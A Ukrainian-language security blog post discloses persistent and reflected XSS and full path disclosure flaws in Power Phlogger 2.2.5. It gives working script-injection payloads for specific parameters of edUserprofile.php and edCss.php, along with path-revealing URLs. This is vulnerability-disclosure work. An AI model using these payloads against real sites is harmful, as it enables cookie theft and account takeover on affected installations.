Websecurity - Веб безпека

Раніше я вже писав про уразливості в Power Phlogger. Зараз повідомлю про нові уразливості в даній системі для ведення статистики відвідувань. В лютому, 16.02.2008, я виявив Cross-Site Scripting та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

XSS (Persistent):

POST запит на сторінці http://site/edUserprofile.php (можливі як GET, так і POST запити):

</textarea><script>alert(document.cookie)</script>В параметрі: N_your_url.

"><script>alert(document.cookie)</script>В параметрі: N_email.

"><script src=http://site.comВ параметрах: N_fg_c, N_bg_c (обмеження в 30 символів).

XSS:

http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit

Full path disclosure:

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це третя частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

This entry was posted on 23:58 16.05.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.